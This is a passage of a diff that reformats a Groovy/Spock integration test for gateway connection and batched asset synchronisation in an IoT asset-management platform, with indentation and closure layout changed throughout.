+    })
+    gatewayClient.addConnectionStatusConsumer({status ->
+      getLOG().info("Gateway client connection staus changed: $status")
+      connectionStatus = status
+    })
 
-        and: "the gateway connects to this manager"
-        gatewayClient.connect()
+    and: "the gateway connects to this manager"
+    gatewayClient.connect()
 
-        then: "the gateway netty client status should become CONNECTING"
-        conditions.eventually {
-            assert connectionStatus == ConnectionStatus.CONNECTING
-            assert gatewayClient.connectionStatus == ConnectionStatus.CONNECTING
-        }
+    then: "the gateway netty client status should become CONNECTING"
+    conditions.eventually {
+      assert connectionStatus == ConnectionStatus.CONNECTING
+      assert gatewayClient.connectionStatus == ConnectionStatus.CONNECTING
+    }
 
-        and: "the gateway asset connection status should be CONNECTING"
-        conditions.eventually {
-            gateway = assetStorageService.find(gateway.getId()) as GatewayAsset
-            assert gateway.getGatewayStatus().orElse(null) == ConnectionStatus.CONNECTING
-        }
+    and: "the gateway asset connection status should be CONNECTING"
+    conditions.eventually {
+      gateway = assetStorageService.find(gateway.getId()) as GatewayAsset
+      assert gateway.getGatewayStatus().orElse(null) == ConnectionStatus.CONNECTING
+    }
 
-        and: "the server should have sent an init start message"
-        conditions.eventually {
-            assert clientReceivedMessages.size() >= 1
-            def request = ValueUtil.JSON.readValue(clientReceivedMessages[0].substring(SharedEvent.MESSAGE_PREFIX.length()), GatewayInitStartEvent.class)
-            assert request.version == VersionInfo.getGatewayApiVersion()
-            assert request.activeTunnels == null
-        }
+    and: "the server should have sent an init start message"
+    conditions.eventually {
+      assert clientReceivedMessages.size() >= 1
+      def request = ValueUtil.JSON.readValue(clientReceivedMessages[0].substring(SharedEvent.MESSAGE_PREFIX.length()), GatewayInitStartEvent.class)
+      assert request.version == VersionInfo.getGatewayApiVersion()
+      assert request.activeTunnels == null
+    }
 
-        when: "the gateway client assets are defined"
-        List<String> agentAssetIds = new CopyOnWriteArrayList<>()
-        List<HTTPAgent> agentAssets = new CopyOnWriteArrayList<>()
-        List<String> assetIds = new CopyOnWriteArrayList<>()
-        List<Asset> assets = new CopyOnWriteArrayList<>()
+    when: "the gateway client assets are defined"
+    List<String> agentAssetIds = new CopyOnWriteArrayList<>()
+    List<HTTPAgent> agentAssets = new CopyOnWriteArrayList<>()
+    List<String> assetIds = new CopyOnWriteArrayList<>()
+    List<Asset> assets = new CopyOnWriteArrayList<>()
 
-        IntStream.rangeClosed(1, 5).forEach { i ->
-            agentAssetIds.add(UniqueIdentifierGenerator.generateId("Test Agent $i"))
-            def agent = new HTTPAgent("Test Agent $i")
-                    .setId(agentAssetIds[i - 1])
-                    .setBaseURI("https://google.co.uk")
-                    .setRealm(MASTER_REALM)
-                    .setCreatedOn(timerService.getNow())
-            agent.path = (String[]) [agentAssetIds[i - 1]].toArray(new String[0])
+    IntStream.rangeClosed(1, 5).forEach { i ->
+      agentAssetIds.add(UniqueIdentifierGenerator.generateId("Test Agent $i"))
+      def agent = new HTTPAgent("Test Agent $i")
+              .setId(agentAssetIds[i - 1])
+              .setBaseURI("https://google.co.uk")
+              .setRealm(MASTER_REALM)
+              .setCreatedOn(timerService.getNow())
+      agent.path = (String[]) [agentAssetIds[i - 1]].toArray(new String[0])
 
-            agentAssets.add(agent)
+      agentAssets.add(agent)
 
-            assetIds.add(UniqueIdentifierGenerator.generateId("Test Building $i"))
+      assetIds.add(UniqueIdentifierGenerator.generateId("Test Building $i"))
 
-            // Add assets out of order to test gateway connector re-ordering logic
-            IntStream.rangeClosed(1, 4).forEach { j ->
+      // Add assets out of order to test gateway connector re-ordering logic
+      IntStream.rangeClosed(1, 4).forEach { j ->
 
-                assetIds.add(UniqueIdentifierGenerator.generateId("Test Building $i Room $j"))
+        assetIds.add(UniqueIdentifierGenerator.generateId("Test Building $i Room $j"))
 
-                def roomAsset = new RoomAsset("Test Building $i Room $j")
-                        .setId(assetIds[(i - 1) * 5 + j])
-                        .setCreatedOn(timerService.getNow())
-                        .setParentId(assetIds[(i - 1) * 5])
-                        .setRealm(MASTER_REALM)
+        def roomAsset = new RoomAsset("Test Building $i Room $j")
+                .setId(assetIds[(i - 1) * 5 + j])
+                .setCreatedOn(timerService.getNow())
+                .setParentId(assetIds[(i - 1) * 5])
+                .setRealm(MASTER_REALM)
 
-                roomAsset.path = (String[]) [assetIds[(i - 1) * 5 + j], assetIds[(i - 1) * 5]].toArray(new String[0])
+        roomAsset.path = (String[]) [assetIds[(i - 1) * 5 + j], assetIds[(i - 1) * 5]].toArray(new String[0])
 
-                roomAsset.addOrReplaceAttributes(
-                        new Attribute<>(Asset.LOCATION, new GeoJSONPoint(10, 11)).addOrReplaceMeta(
-                                new MetaItem<>(ACCESS_PUBLIC_READ)
+        roomAsset.addOrReplaceAttributes(
+                new Attribute<>(Asset.LOCATION, new GeoJSONPoint(10, 11)).addOrReplaceMeta(
+                        new MetaItem<>(ACCESS_PUBLIC_READ)
                         ),
-                        new Attribute<>("temp", NUMBER).addOrReplaceMeta(
-                                new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agentAssetIds[i - 1])
-                                        .setPath("")),
-                                new MetaItem<>(UNITS, Constants.units(UNITS_CELSIUS))
+                new Attribute<>("temp", NUMBER).addOrReplaceMeta(
+                        new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agentAssetIds[i - 1])
+                        .setPath("")),
+                        new MetaItem<>(UNITS, Constants.units(UNITS_CELSIUS))
                         ),
-                        new Attribute<>("tempSetpoint", NUMBER).addMeta(
-                                new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agentAssetIds[i - 1])
-                                        .setPath("")),
-                                new MetaItem<>(UNITS, Constants.units(UNITS_CELSIUS))
+                new Attribute<>("tempSetpoint", NUMBER).addMeta(
+                        new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agentAssetIds[i - 1])
+                        .setPath("")),
+                        new MetaItem<>(UNITS, Constants.units(UNITS_CELSIUS))
                         )
                 )
 
-                assets.add(roomAsset)
-            }
+        assets.add(roomAsset)
+      }
 
-            def buildingAsset = new BuildingAsset("Test Building $i")
-                    .setId(assetIds[(i - 1) * 5])
-                    .setCreatedOn(timerService.getNow())
-                    .setRealm(MASTER_REALM)
+      def buildingAsset = new BuildingAsset("Test Building $i")
+              .setId(assetIds[(i - 1) * 5])
+              .setCreatedOn(timerService.getNow())
+              .setRealm(MASTER_REALM)
 
-            buildingAsset.path = (String[]) [assetIds[(i - 1) * 5]].toArray(new String[0])
+      buildingAsset.path = (String[]) [assetIds[(i - 1) * 5]].toArray(new String[0])
 
-            buildingAsset.addOrReplaceAttributes(
-                    new Attribute<>(Asset.LOCATION, new GeoJSONPoint(10, 11)).addMeta(
-                            new MetaItem<>(ACCESS_PUBLIC_READ)
+      buildingAsset.addOrReplaceAttributes(
+              new Attribute<>(Asset.LOCATION, new GeoJSONPoint(10, 11)).addMeta(
+                      new MetaItem<>(ACCESS_PUBLIC_READ)
+                      )
+              )
+
+      assets.add(buildingAsset)
+    }
+
+    and: "the gateway client replies to the central manager with the assets of the gateway"
+    List<Asset> sendAssets = new CopyOnWriteArrayList<>()
+    sendAssets.addAll(agentAssets)
+    sendAssets.addAll(assets)
+    def readAssetsReplyEvent = new AssetsEvent(sendAssets)
+    readAssetsReplyEvent.setMessageID(GatewayConnector.ASSET_READ_EVENT_NAME_INITIAL)
+    gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(readAssetsReplyEvent).get())
+
+    then: "the central manager should have requested the full loading of the first batch of assets"
+    String messageId = null
+    ReadAssetsEvent readAssetsEvent = null
+    conditions.eventually {
+      def readEventStr = clientReceivedMessages.find {
+        it.contains("read-assets") && it.contains(GatewayConnector.ASSET_READ_EVENT_NAME_BATCH + "0")
+      }
+      assert readEventStr != null
+      readAssetsEvent = ValueUtil.JSON.readValue(readEventStr.substring(SharedEvent.MESSAGE_PREFIX.length()), ReadAssetsEvent.class)
+      messageId = readAssetsEvent.messageID
+      assert readAssetsEvent.messageID == GatewayConnector.ASSET_READ_EVENT_NAME_BATCH + "0"
+      assert readAssetsEvent.assetQuery != null
+      assert readAssetsEvent.assetQuery.ids != null
+      assert readAssetsEvent.assetQuery.ids.length == GatewayConnector.SYNC_ASSET_BATCH_SIZE
+      assert agentAssetIds.stream().filter {
+        readAssetsEvent.assetQuery.ids.contains(it)
+      }.count() == agentAssetIds.size()
+      assert assetIds.stream().filter {
+        readAssetsEvent.assetQuery.ids.contains(it)
+      }.count() == GatewayConnector.SYNC_ASSET_BATCH_SIZE - agentAssetIds.size()
+    }
+
+    when: "the gateway returns the requested assets"
+    sendAssets = new CopyOnWriteArrayList<>()
+    sendAssets.addAll(agentAssets)
+    sendAssets.addAll(Arrays.stream(readAssetsEvent.assetQuery.ids).filter {
+      !agentAssetIds.contains(it)
+    }.map { id ->
+      assets.stream().filter { asset ->
+        asset.id == id
+      }.findFirst().orElse(null)
+    }.collect(Collectors.toList()))
+    readAssetsReplyEvent = new AssetsEvent(sendAssets)
+    readAssetsReplyEvent.setMessageID(messageId)
+    gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(readAssetsReplyEvent).get())
+
+    then: "the central manager should have added the first batch of assets under the gateway asset"
+    conditions.eventually {
+      def syncedAssets = assetStorageService.findAll(new AssetQuery().parents(gateway.getId()).recursive(true))
+      assert syncedAssets.size() == sendAssets.size()
+      assert syncedAssets.stream().filter { syncedAsset ->
+        sendAssets.stream().anyMatch {
+          mapAssetId(gateway.getId(), it.id, false) == syncedAsset.id
+        }
+      }.count() == sendAssets.size()
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == agentAssetIds[0]
+      }.getName() == "Test Agent 1"
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == agentAssetIds[0]
+      }.getType() == HTTPAgent.DESCRIPTOR.name
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == agentAssetIds[0]
+      }.getRealm() == managerTestSetup.realmBuildingName
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == agentAssetIds[0]
+      }.getParentId() == gateway.getId()
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == agentAssetIds[4]
+      }.getName() == "Test Agent 5"
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == agentAssetIds[4]
+      }.getType() == HTTPAgent.DESCRIPTOR.name
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == agentAssetIds[4]
+      }.getRealm() == managerTestSetup.realmBuildingName
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == agentAssetIds[4]
+      }.getParentId() == gateway.getId()
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[0]
+      }.getName() == "Test Building 1"
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[0]
+      }.getType() == BuildingAsset.DESCRIPTOR.name
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[0]
+      }.getRealm() == managerTestSetup.realmBuildingName
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[0]
+      }.getParentId() == gateway.getId()
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[0]
+      }.getLocation().get().x == 10
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[0]
+      }.getLocation().get().y == 11
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[0]
+      }.getAttribute(Asset.LOCATION).flatMap{
+        it.getMetaItem(ACCESS_PUBLIC_READ)
+      }.isPresent()
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[1]
+      }.getName() == "Test Building 1 Room 1"
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[1]
+      }.getType() == RoomAsset.DESCRIPTOR.getName()
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[1]
+      }.getRealm() == managerTestSetup.realmBuildingName
+      assert mapAssetId(gateway.getId(), syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[1]
+      }.getParentId(), true) == assetIds[0]
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[1]
+      }.getAttribute("temp").map{
+        it.hasMeta(AGENT_LINK)
+      }.orElse(false)
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[1]
+      }.getAttribute("tempSetpoint").map{
+        it.hasMeta(AGENT_LINK)
+      }.orElse(false)
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[5]
+      }.getName() == "Test Building 2"
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[5]
+      }.getType() == BuildingAsset.DESCRIPTOR.getName()
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[5]
+      }.getRealm() == managerTestSetup.realmBuildingName
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[5]
+      }.getParentId() == gateway.getId()
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[5]
+      }.getLocation().get().x == 10
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[5]
+      }.getLocation().get().y == 11
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[5]
+      }.getAttribute(Asset.LOCATION).flatMap{
+        it.getMetaItem(ACCESS_PUBLIC_READ)
+      }.isPresent()
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[6]
+      }.getName() == "Test Building 2 Room 1"
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[6]
+      }.getType() == RoomAsset.DESCRIPTOR.getName()
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[6]
+      }.getRealm() == managerTestSetup.realmBuildingName
+      assert mapAssetId(gateway.getId(), syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[6]
+      }.getParentId(), true) == assetIds[5]
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[6]
+      }.getAttribute("temp").map{
+        it.hasMeta(AGENT_LINK)
+      }.orElse(false)
+      assert syncedAssets.find {
+        mapAssetId(gateway.getId(), it.id, true) == assetIds[6]
+      }.getAttribute("tempSetpoint").map{
+        it.hasMeta(AGENT_LINK)
+      }.orElse(false)
+    }
+
+    and: "the central manager should have requested the full loading of the second batch of assets"
+    conditions.eventually {
+      def readEventStr = clientReceivedMessages.find {
+        it.contains("read-assets") && it.contains(GatewayConnector.ASSET_READ_EVENT_NAME_BATCH + GatewayConnector.SYNC_ASSET_BATCH_SIZE)
+      }
+      assert readEventStr != null
+      readAssetsEvent = ValueUtil.JSON.readValue(readEventStr.substring(SharedEvent.MESSAGE_PREFIX.length()), ReadAssetsEvent.class)
+      messageId = readAssetsEvent.messageID
+      assert readAssetsEvent.messageID == GatewayConnector.ASSET_READ_EVENT_NAME_BATCH + GatewayConnector.SYNC_ASSET_BATCH_SIZE
+      assert readAssetsEvent.assetQuery != null
+      assert readAssetsEvent.assetQuery.ids != null
+      assert readAssetsEvent.assetQuery.ids.length == agentAssetIds.size() + assetIds.size() - GatewayConnector.SYNC_ASSET_BATCH_SIZE
+      assert assetIds.stream().filter { id ->
+        sendAssets.stream().noneMatch {
+          it.id == id
+        }
+      }.count() == readAssetsEvent.assetQuery.ids.length
+    }
+
+    when: "the gateway returns the requested assets"
+    sendAssets = new CopyOnWriteArrayList<>()
+    sendAssets.addAll(Arrays.stream(readAssetsEvent.assetQuery.ids).map { id ->
+      assets.stream().filter { asset ->
+        asset.id == id
+      }.findFirst().orElse(null)
+    }.collect(Collectors.toList()))
+    readAssetsReplyEvent = new AssetsEvent(sendAssets)
+    readAssetsReplyEvent.setMessageID(messageId)
+    gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(readAssetsReplyEvent).get())
+
+    then: "the central manager should have requested the capabilities of the gateway"
+    conditions.eventually {
+      def capabilitiesEventStr = clientReceivedMessages.find {
+        it.contains(GatewayCapabilitiesRequestEvent.TYPE)
+      }
+      def gatewayCapabilitiesRequest = ValueUtil.JSON.readValue(capabilitiesEventStr.substring(SharedEvent.MESSAGE_PREFIX.length()), GatewayCapabilitiesRequestEvent.class)
+      messageId = gatewayCapabilitiesRequest.messageID
+    }
+
+    when: "the gateway returns the capabilities"
+    def capabilitiesReplyEvent = new GatewayCapabilitiesResponseEvent(VersionInfo.getGatewayApiVersion(), true)
+    capabilitiesReplyEvent.setMessageID(messageId)
+    gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(capabilitiesReplyEvent).get())
+
+    then: "the gateway connector capabilities should be updated"
+    conditions.eventually {
+      def gatewayConnector = gatewayService.gatewayConnectorMap.get(gateway.getId().toLowerCase(Locale.ROOT))
+      assert gatewayConnector.isConnected()
+      assert !gatewayConnector.isInitialSyncInProgress()
+      assert gatewayConnector.isTunnellingSupported()
+    }
+
+    and: "the central manager should have responded to indicate sync is done"
+    conditions.eventually {
+      def initDoneEventStr = clientReceivedMessages.find {
+        it.contains(GatewayInitDoneEvent.TYPE)
+      }
+      def gatewayInitDoneEvent = ValueUtil.JSON.readValue(initDoneEventStr.substring(SharedEvent.MESSAGE_PREFIX.length()), GatewayInitDoneEvent.class)
+    }
+
+    and: "the gateway client should now be CONNECTED"
+    conditions.eventually {
+      assert connectionStatus == ConnectionStatus.CONNECTED
+      assert gatewayClient.connectionStatus == ConnectionStatus.CONNECTED
+    }
+
+    and: "the gateway asset connection status should be CONNECTED"
+    conditions.eventually {
+      gateway = assetStorageService.find(gateway.getId()) as GatewayAsset
+      assert gateway.getGatewayStatus().orElse(null) == ConnectionStatus.CONNECTED
+    }
+
+    and: "all the gateway assets should be replicated underneath the gateway"
+    conditions.eventually {
+      assert assetStorageService.findAll(new AssetQuery().parents(gateway.getId()).recursive(true)).size() == agentAssets.size() + assets.size()
+    }
+
+    and: "the http client protocol of the gateway agents should not have been linked to the central manager"
+    Thread.sleep(500)
+    conditions.eventually {
+      assert !agentService.protocolInstanceMap.containsKey(agentAssetIds[0])
+      assert !agentService.agents.containsKey(agentAssetIds[0])
+      assert !agentService.protocolInstanceMap.containsKey(agentAssetIds[4])
+      assert !agentService.agents.containsKey(agentAssetIds[4])
+    }
+
+    when: "the previously received messages are cleared"
+    clientReceivedMessages.clear()
+
+    and: "time advances"
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
+
+    and: "an attribute event for a gateway descendant asset (building 1 room 1) is sent to the local manager"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(mapAssetId(gateway.id, assetIds[1], false), "tempSetpoint", 20d))
+
+    then: "the event should have been forwarded to the gateway"
+    conditions.eventually {
+      assert clientReceivedMessages.size() == 1
+      assert clientReceivedMessages.get(0).startsWith(SharedEvent.MESSAGE_PREFIX)
+      assert clientReceivedMessages.get(0).contains("attribute")
+    }
+
+    when: "the gateway handles the forwarded attribute event and sends a follow up attribute event to the local manager"
+    gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(new AttributeEvent(assetIds[1], "tempSetpoint", 20d)).get())
+
+    then: "the descendant asset in the local manager should contain the new attribute value"
+    conditions.eventually {
+      def building1Room1Asset = assetStorageService.find(mapAssetId(gateway.id, assetIds[1], false))
+      assert building1Room1Asset.getAttribute("tempSetpoint").flatMap {
+        it.getValue()
+      }.orElse(0d) == 20d
+    }
+
+    when: "an asset is added on the gateway and the local manager is notified"
+    def building1Room5AssetId = UniqueIdentifierGenerator.generateId("Test Building 1 Room 5")
+    def building1Room5Asset = new RoomAsset("Test Building 1 Room 5")
+            .setId(building1Room5AssetId)
+            .setCreatedOn(timerService.getNow())
+            .setParentId(assetIds[0])
+            .setRealm(MASTER_REALM)
+    building1Room5Asset.path = (String[]) [building1Room5AssetId, assetIds[0]]
+
+    building1Room5Asset.addOrReplaceAttributes(
+            new Attribute<>(Asset.LOCATION, new GeoJSONPoint(10, 11)).addOrReplaceMeta(
+                    new MetaItem<>(ACCESS_PUBLIC_READ)
+                    ),
+            new Attribute<>("temp", NUMBER).addOrReplaceMeta(
+                    new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agentAssetIds[0])
+                    .setPath("")),
+                    new MetaItem<>(UNITS, Constants.units(UNITS_CELSIUS))
+                    ),
+            new Attribute<>("tempSetpoint", NUMBER).addMeta(
+                    new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agentAssetIds[0])
+                    .setPath("")),
+                    new MetaItem<>(UNITS, Constants.units(UNITS_CELSIUS))
                     )
             )
 
-            assets.add(buildingAsset)
-        }
-
-        and: "the gateway client replies to the central manager with the assets of the gateway"
-        List<Asset> sendAssets = new CopyOnWriteArrayList<>()
-        sendAssets.addAll(agentAssets)
-        sendAssets.addAll(assets)
-        def readAssetsReplyEvent = new AssetsEvent(sendAssets)
-        readAssetsReplyEvent.setMessageID(GatewayConnector.ASSET_READ_EVENT_NAME_INITIAL)
-        gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(readAssetsReplyEvent).get())
-
-        then: "the central manager should have requested the full loading of the first batch of assets"
-        String messageId = null
-        ReadAssetsEvent readAssetsEvent = null
-        conditions.eventually {
-            def readEventStr = clientReceivedMessages.find {it.contains("read-assets") && it.contains(GatewayConnector.ASSET_READ_EVENT_NAME_BATCH + "0")}
-            assert readEventStr != null
-            readAssetsEvent = ValueUtil.JSON.readValue(readEventStr.substring(SharedEvent.MESSAGE_PREFIX.length()), ReadAssetsEvent.class)
-            messageId = readAssetsEvent.messageID
-            assert readAssetsEvent.messageID == GatewayConnector.ASSET_READ_EVENT_NAME_BATCH + "0"
-            assert readAssetsEvent.assetQuery != null
-            assert readAssetsEvent.assetQuery.ids != null
-            assert readAssetsEvent.assetQuery.ids.length == GatewayConnector.SYNC_ASSET_BATCH_SIZE
-            assert agentAssetIds.stream().filter { readAssetsEvent.assetQuery.ids.contains(it) }.count() == agentAssetIds.size()
-            assert assetIds.stream().filter { readAssetsEvent.assetQuery.ids.contains(it) }.count() == GatewayConnector.SYNC_ASSET_BATCH_SIZE - agentAssetIds.size()
-        }
-
-        when: "the gateway returns the requested assets"
-        sendAssets = new CopyOnWriteArrayList<>()
-        sendAssets.addAll(agentAssets)
-        sendAssets.addAll(Arrays.stream(readAssetsEvent.assetQuery.ids).filter { !agentAssetIds.contains(it) }.map { id -> assets.stream().filter { asset -> asset.id == id }.findFirst().orElse(null) }.collect(Collectors.toList()))
-        readAssetsReplyEvent = new AssetsEvent(sendAssets)
-        readAssetsReplyEvent.setMessageID(messageId)
-        gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(readAssetsReplyEvent).get())
-
-        then: "the central manager should have added the first batch of assets under the gateway asset"
-        conditions.eventually {
-            def syncedAssets = assetStorageService.findAll(new AssetQuery().parents(gateway.getId()).recursive(true))
-            assert syncedAssets.size() == sendAssets.size()
-            assert syncedAssets.stream().filter { syncedAsset -> sendAssets.stream().anyMatch { mapAssetId(gateway.getId(), it.id, false) == syncedAsset.id } }.count() == sendAssets.size()
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == agentAssetIds[0] }.getName() == "Test Agent 1"
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == agentAssetIds[0] }.getType() == HTTPAgent.DESCRIPTOR.name
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == agentAssetIds[0] }.getRealm() == managerTestSetup.realmBuildingName
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == agentAssetIds[0] }.getParentId() == gateway.getId()
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == agentAssetIds[4] }.getName() == "Test Agent 5"
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == agentAssetIds[4] }.getType() == HTTPAgent.DESCRIPTOR.name
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == agentAssetIds[4] }.getRealm() == managerTestSetup.realmBuildingName
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == agentAssetIds[4] }.getParentId() == gateway.getId()
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == assetIds[0] }.getName() == "Test Building 1"
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == assetIds[0] }.getType() == BuildingAsset.DESCRIPTOR.name
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == assetIds[0] }.getRealm() == managerTestSetup.realmBuildingName
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == assetIds[0] }.getParentId() == gateway.getId()
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == assetIds[0] }.getLocation().get().x == 10
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == assetIds[0] }.getLocation().get().y == 11
-            assert syncedAssets.find {mapAssetId(gateway.getId(), it.id, true) == assetIds[0]}.getAttribute(Asset.LOCATION).flatMap{it.getMetaItem(ACCESS_PUBLIC_READ)}.isPresent()
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == assetIds[1] }.getName() == "Test Building 1 Room 1"
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == assetIds[1] }.getType() == RoomAsset.DESCRIPTOR.getName()
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == assetIds[1] }.getRealm() == managerTestSetup.realmBuildingName
-            assert mapAssetId(gateway.getId(), syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == assetIds[1] }.getParentId(), true) == assetIds[0]
-            assert syncedAssets.find {mapAssetId(gateway.getId(), it.id, true) == assetIds[1]}.getAttribute("temp").map{it.hasMeta(AGENT_LINK)}.orElse(false)
-            assert syncedAssets.find {mapAssetId(gateway.getId(), it.id, true) == assetIds[1]}.getAttribute("tempSetpoint").map{it.hasMeta(AGENT_LINK)}.orElse(false)
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == assetIds[5] }.getName() == "Test Building 2"
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == assetIds[5] }.getType() == BuildingAsset.DESCRIPTOR.getName()
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == assetIds[5] }.getRealm() == managerTestSetup.realmBuildingName
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == assetIds[5] }.getParentId() == gateway.getId()
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == assetIds[5] }.getLocation().get().x == 10
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == assetIds[5] }.getLocation().get().y == 11
-            assert syncedAssets.find {mapAssetId(gateway.getId(), it.id, true) == assetIds[5]}.getAttribute(Asset.LOCATION).flatMap{it.getMetaItem(ACCESS_PUBLIC_READ)}.isPresent()
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == assetIds[6] }.getName() == "Test Building 2 Room 1"
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == assetIds[6] }.getType() == RoomAsset.DESCRIPTOR.getName()
-            assert syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == assetIds[6] }.getRealm() == managerTestSetup.realmBuildingName
-            assert mapAssetId(gateway.getId(), syncedAssets.find { mapAssetId(gateway.getId(), it.id, true) == assetIds[6] }.getParentId(), true) == assetIds[5]
-            assert syncedAssets.find {mapAssetId(gateway.getId(), it.id, true) == assetIds[6]}.getAttribute("temp").map{it.hasMeta(AGENT_LINK)}.orElse(false)
-            assert syncedAssets.find {mapAssetId(gateway.getId(), it.id, true) == assetIds[6]}.getAttribute("tempSetpoint").map{it.hasMeta(AGENT_LINK)}.orElse(false)
-        }
-
-        and: "the central manager should have requested the full loading of the second batch of assets"
-        conditions.eventually {
-            def readEventStr = clientReceivedMessages.find {it.contains("read-assets") && it.contains(GatewayConnector.ASSET_READ_EVENT_NAME_BATCH + GatewayConnector.SYNC_ASSET_BATCH_SIZE)}
-            assert readEventStr != null
-            readAssetsEvent = ValueUtil.JSON.readValue(readEventStr.substring(SharedEvent.MESSAGE_PREFIX.length()), ReadAssetsEvent.class)
-            messageId = readAssetsEvent.messageID
-            assert readAssetsEvent.messageID == GatewayConnector.ASSET_READ_EVENT_NAME_BATCH + GatewayConnector.SYNC_ASSET_BATCH_SIZE
-            assert readAssetsEvent.assetQuery != null
-            assert readAssetsEvent.assetQuery.ids != null
-            assert readAssetsEvent.assetQuery.ids.length == agentAssetIds.size() + assetIds.size() - GatewayConnector.SYNC_ASSET_BATCH_SIZE
-            assert assetIds.stream().filter { id -> sendAssets.stream().noneMatch { it.id == id } }.count() == readAssetsEvent.assetQuery.ids.length
-        }
-
-        when: "the gateway returns the requested assets"
-        sendAssets = new CopyOnWriteArrayList<>()
-        sendAssets.addAll(Arrays.stream(readAssetsEvent.assetQuery.ids).map { id -> assets.stream().filter { asset -> asset.id == id }.findFirst().orElse(null) }.collect(Collectors.toList()))
-        readAssetsReplyEvent = new AssetsEvent(sendAssets)
-        readAssetsReplyEvent.setMessageID(messageId)
-        gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(readAssetsReplyEvent).get())
-
-        then: "the central manager should have requested the capabilities of the gateway"
-        conditions.eventually {
-            def capabilitiesEventStr = clientReceivedMessages.find {it.contains(GatewayCapabilitiesRequestEvent.TYPE)}
